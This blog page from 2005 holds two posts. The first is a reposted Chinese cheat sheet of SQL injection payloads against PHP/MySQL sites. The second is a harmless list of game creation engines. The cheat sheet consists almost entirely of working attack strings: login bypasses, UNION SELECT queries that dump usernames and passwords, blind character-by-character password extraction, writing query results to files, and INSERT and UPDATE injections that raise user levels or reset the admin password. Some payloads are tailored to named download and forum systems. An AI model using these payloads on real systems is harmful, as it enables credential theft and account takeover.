IT博客-快乐着飞舞着-文章分类-Others

[转载]PHP injection总结

快乐着飞舞着 — Fri, 08 Jul 2005 05:01:00 GMT

  1>' or 1=1
  2' or '1=1
  3---'/*
  4'%23
  5' and password='mypass
  6id=-1 union select 1,1,1
  7id=-1 union select char(97),char(97),char(97)
  8id=1 union select 1,1,1 from members
  9id=1 union select 1,1,1 from admin
10id=1 union select 1,1,1 from user
11userid=1 and password=mypass
12userid=1 and mid(password,3,1)=char(112)
13userid=1 and mid(password,4,1)=char(97)
14and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）
15' and LENGTH(password)='6（探测密码长度）
16' and LEFT(password,1)='m
17' and LEFT(password,2)='my
18依次类推
19' union select 1,username,password from user/*
20' union select 1,username,password from user/*
21=' union select 1,username,password from user/* （可以是1或者=后直接跟）
2299999' union select 1,username,password from user/*
23' into outfile 'c:/file.txt （导出文件）
24=' or 1=1 into outfile 'c:/file.txt
251' union select 1,username,password from user into outfile 'c:/user.txt
26select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/fi
27
28le.txt'
29id=' union select 1,username,password from user into outfile
30id=-1 union select 1,database(),version() （灵活应用查询）
31--常用查询测试语句，
32select * FROM table where 1=1
33select * FROM table where 'uuu'='uuu'
34select * FROM table where 1<>2
35select * FROM table where 3>2
36select * FROM table where 2<3
37select * FROM table where 1
38select * FROM table where 1+1
39select * FROM table where 1--1
40select * FROM table where ISNULL(NULL)
41select * FROM table where ISNULL(COT(0))
42select * FROM table where 1 IS NOT NULL
43select * FROM table where NULL IS NULL
44select * FROM table where 2 BETWEEN 1 AND 3
45select * FROM table where 'b' BETWEEN 'a' AND 'c'
46select * FROM table where 2 IN (0,1,2)
47select * FROM table where CASE WHEN 1>0 THEN 1 END
48--例如：夜猫下载系统1.0版本
49id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
50union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
51union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
52
53
54id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user w
55
56here id=1 and groupid=1
57union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_u
58
59ser where id=1 --（替换，寻找密码）
60union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
61
62 and ord(mid(password,1,1))=49 --（验证第一位密码）
63union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
64
65 and ord(mid(password,2,1))=50 --（第二位）
66union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
67
68 and ord(mid(password,3,1))=51
69----
70---例如2：灰色轨迹变换id进行测试（meteor）
71union%20(select%20allowsmilies,public,userid,'0000-0-0',user (),version()%20FR
72
73OM%20calendar_events%20where%20eventid%20=% 2013)%20order%20by%20eventdate
74union%20(select%20allowsmilies,public,userid,'0000-0-0',pass (),version()%20FR
75
76OM%20calendar_events%20where%20eventid%20=% 2010)%20order%20by%20eventdate
77---构造语句：
78select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
79
80 where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
81select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
82
83 where eventid = 1 union (select 1,1,1,1,username,password from user where use
84
85rid=1)
86union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20u ser%20where%20use
87
88rid%20=%205)%20order%20by%20eventdate
89union%20(select%201,0,12695,'1999-01-01','a',password%20FROM %20user%20where%2
90
910userid=13465)%20order%20by%20eventdate
92union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%2 0user%20where%20u
93
94sername='sandflee')%20order%20by%20eventdat e -----（查沙子的id）
95
96（select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
97select * FROM article where articleid='$id' union select * FROM---（字段和数
98
99----据库相同情况下，可直接提交）
100select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM
101
102----（不同的情况下）
103----特殊技巧：在表单，搜索引擎等地方写：
104"___"
105".__ "
106"%
107%' ORDER BY articleid/*
108%' ORDER BY articleid#
109__' ORDER BY articleid/*
110__' ORDER BY articleid#
111$command = "dir c:\";system($command);
112select * FROM article where articleid='$id'
113select * FROM article where articleid=$id
1141' and 1=2 union select * from user where userid=1----/* 句中变为
115(select * FROM article where articleid='1' and 1=2 union select * from user wh
116
117ere userid=1/*')
1181 and 1=2 union select * from user where userid=1
119---语句形式：建立一个库，插入：
120create DATABASE `injection`
121create TABLE `user` (
122`userid` int(11) NOT NULL auto_increment,
123`username` varchar(20) NOT NULL default '',
124`password` varchar(20) NOT NULL default '',
125PRIMARY KEY (`userid`)
126) ;
127insert INTO `user` VALUES (1, 'swap', 'mypass');
128
129----插如一个注册用户：
130insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('
131
132', '$username', '$password', '$homepage', '1');
133"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$p
134
135ass','$nom','$email','1')";
136insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','
137
1383')#','1')
139"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$em
140
141ail'";
142insert INTO membres SET login='',password='',nom='',userlevel='3',email=''
143"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";
144update user SET password='$password', homepage='$homepage' where id='$id'
145update user SET password='MD5(mypass)' where username='admin'#)', homepage='$h
146
147omepage' where id='$id'
148"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"
149
150;
151update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='
152
153[ID]'
154"update news SET Votes=Votes+1, score=score+$note where idnews='$id'";
155长用函数：
156DATABASE()
157USER()
158SYSTEM_USER()
159SESSION_USER()
160CURRENT_USER()
161-----比如：
162update article SET title=$title where articleid=1 对应函数
163update article SET title=DATABASE() where id=1
164----#把当前数据库名更新到title字段
165update article SET title=USER() where id=1
166---#把当前 MySQL 用户名更新到title字段
167update article SET title=SYSTEM_USER() where id=1
168---#把当前 MySQL 用户名更新到title字段
169update article SET title=SESSION_USER() where id=1
170---#把当前 MySQL 用户名更新到title字段
171update article SET title=CURRENT_USER() where id=1
172---#把当前会话被验证匹配的用户名更新到title字段
173：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：
174
175：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：
176$req = "select * FROM membres where name like '%$search%' ORDER BY name";
177select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
178select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
179select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' ----（
180
181经典）
182select uid FROM admins where login='' OR admin_level=1#' AND password=''
183select * FROM table where msg like '%hop'
184select uid FROM membres where login='Bob' AND password like 'a%'#' AND passwor
185
186d=''
187select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
188

快乐着飞舞着 2005-07-08 13:01 发表评论

Game creation kits / engines

快乐着飞舞着 — Sun, 03 Jul 2005 08:06:00 GMT

Game creation kits / engines

(in no specific order)

Torque game engine

The Torque Game Engine started life as the technology behind Dynamix/Sierra/Vivendi's products Tribes, Starsiege, and Tribes 2, and is an industry proven engine. It is currently being used by thousands of developers around the world with shipping titles. The Torque Game Engine (TGE) is a fully featured AAA game engine with award winning multi-player network code, seamless indoor/outdoor rendering engines, state of the art skeletal animation, drag and drop GUI creation, a built in world editor, and a C-like scripting language.

3d gamestudio

With hundreds of published titles, 3D GameStudio is the leading authoring system for all sorts of 2D and 3D realtime applications. It combines a high-end 3D engine, a 2D engine, a physics engine, a map and model editor, a script compiler and huge libraries of 3D objects, artwork and pre-made games.

3Impact Game Engine

Royalty free 3d game engine designed to be easy to use, featuring C++syntax, multi-bone skeletal animation, mesh warping, texture animation,accurate collision response, constraints, stacked objects, wheels withsuspensions, volumetric shadows, particle systems, true mirror surfaces, 3dogg sounds and more.

Game Maker

Did you always want to design computer games? But you don't want to spend a lot of time learning how to become a programmer? Then you came to the right place. Game Maker is a program that allows you to make exciting computer games without the need to write a single line of code. Using easy to learn drag-and-drop actions you can make professional looking games in little time.

the 3d game maker
Gamespy review

Now anyone can build their ideal game in seconds. With just one click of a mouse, you can create a uniquely playable game without needing any programming knowledge or artistic skills at all. Offering over 12 billion gaming options, The 3D Gamemaker opens up a whole new concept in gaming, providing fun for all the family.

Explorations

Explorations is an independent role playing game engine. It uses a complex database design to describe all objects and characters within any game world. Explorations features a powerful drag drop map interface that makes creating professional looking maps easy. Import hundreds of pre-made weapons, spells, map objects, and sprites and drop them within your map! Exploration makes map building a snap!

Sphere

Sphere is a 2D RPG engine, in development since 1997. It allows people with not much programming experience to create role-playing games like Final Fantasy VI or Phantasy Star.

Hamster Republic RPG Construction Engine

The OHRRPGCE is a free utility that you can use to create your own RPG game in a style similar to the classic Final Fantasy games on the NES and SNES which have so shaped the RPG genre.

the RPG Toolkit

The RPG Toolkit is an extremely flexible development system for creating Role Playing Games.

The Games Factory

The Games Factory provides everything you need to manufacture Arcade games, Platform games, Adventures, Screen Savers, and much, much, more. You simply click on an object, drag it to the play field, and click on the action it should perform. We supply all the heros, monsters, powerups, and other objects you need, plus the sound and music for your games. Of course, you can easily add your own, custom items if you choose.

Agast

AGAST, the Adventure Game Authoring System, is a set of programs used to create and play your own graphic adventure games like those from LucasArts and Sierra On-line. It includes a script compiler, a game interpreter, and utilities to create and import game data.

Blender

Fully integrated 3D creation suite, which allows modeling, animation, rendering, postproduction, interactive 3D creation and playback.

Adventure Maker

Game creation kit that allows you to create your own first-person adventure games without any coding.

3d RAD

3D RAD is a programmable, user-friendly, 3d real-time engine
3d RAD features : hardware accelerated 3d graphic support, 3d sound system, very user-friendly object oriented wysiwyg interface, step-by-step tutorials, advanced kinematics effects, multi-split-screen ability. Special effects: colored lights, fog, translucency, smoke, fire, explosions

DCGames

DCGames is a feature laden tool kit for creating the hottest CRPGs available. This system allows the user to create original Computer Role Playing games(CRPGs) without having to type a single line or archaic code. The system stresses maximum flexibility that allows each designer to customize the system to suit his or her own tastes.The system comes packaged with a complete set of scripts that can be changed and modified to create the best CRPGs currently available.

Verge

VERGE is Vecnas Extraordinary Role-Playing Game Engine. Simply put, it is a tool for the creation of video games, without having to code the actual graphics/sound/memory librarys and engines yourself. It was initially made to create clones of the 16-bit Console Style RPG, such as Final Fantasy 4-6 (That'd be Final Fantasy 4 and 6 in america) on the SNES, and Phantasy Star 2-4 and the lunar games on Sega Genesis. However, it has since been proven that it can be used for creation of other genres of games.

快乐着飞舞着 2005-07-03 16:06 发表评论